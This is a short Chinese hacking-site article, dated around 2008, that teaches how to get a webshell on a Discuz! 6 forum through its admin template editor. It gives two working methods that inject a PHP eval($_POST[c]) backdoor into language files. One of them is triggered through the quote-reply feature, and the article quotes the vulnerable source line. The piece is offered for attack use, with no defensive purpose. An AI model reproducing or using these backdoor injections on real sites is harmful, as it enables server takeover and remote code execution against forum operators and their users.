 |
黑客教你Discuz!6后台拿Shell的方法
文章作者:Ryat (lib3r3t) 信息来源:邪恶八进制信息安全团队(www.eviloctal.com) 注:文章首发狼族(www.wolvez.org),后由原创作者有请提交到邪恶八进制,转载请注明原始作者和出处。 如果后台可以在线编辑模板的话,下面的方法就可以拿SHELL了:) |
1.后台编辑customfaq(customfaq.lang.php文件) 在<?的后面加上 复制内容到剪贴板 代码: eval($_POST[c]); 2.后台编辑misc(misc.lang.php文件) 把post_reply_quote对应的内容改为 复制内容到剪贴板 代码: ";eval($_POST[c]);" 在前台回帖处选择引用回复。 简单看下代码: include/newreply.inc.php 107行: 复制内容到剪贴板 代码: eval("\$language['post_reply_quote'] = \"$language[post_reply_quote]\";"); 呵呵,一个天然的后门:) PS:还有几个编辑模板的地方可以利用,和第二种方法类似。 |
相关黑客文章
- 2008-12-28[黑客编程] [原创]从零开始学编程之四:编..
- 2008-12-02[安全防护] 清除系统中黑客种植木马藏身之地
- 2008-11-29[安全防护] 视频木马的制作与防范手段
- 2008-11-29[脚本漏洞] QQ木马到底怎么让黑客练成的
- 2008-11-28[脚本漏洞] 万网虚拟机漏洞黑客获得VIP木马..
- 2008-06-14[本地提权] DBO权限日志备份专用一句话木马
- 2008-06-12[黑客编程] 打造自己的线程QQ木马
- 2008-06-10[安全防护] 七步让木马与你断绝关系
- 2008-06-08[安全防护] 防范三绝技-谈木马“查、堵、杀..
- 2008-06-07[加密解密] Web木马样本获取的简单流程
